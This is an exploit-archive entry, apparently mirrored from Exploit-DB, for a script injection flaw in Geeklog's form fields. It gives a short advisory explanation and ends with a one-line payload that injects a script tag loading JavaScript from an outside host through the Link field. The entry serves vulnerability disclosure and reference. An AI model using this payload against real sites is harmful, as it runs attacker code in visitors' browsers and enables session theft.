exploit-db-mirror/exploits/php/webapps/21528.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
443 B
Text

source: https://www.securityfocus.com/bid/4974/info
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.
Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>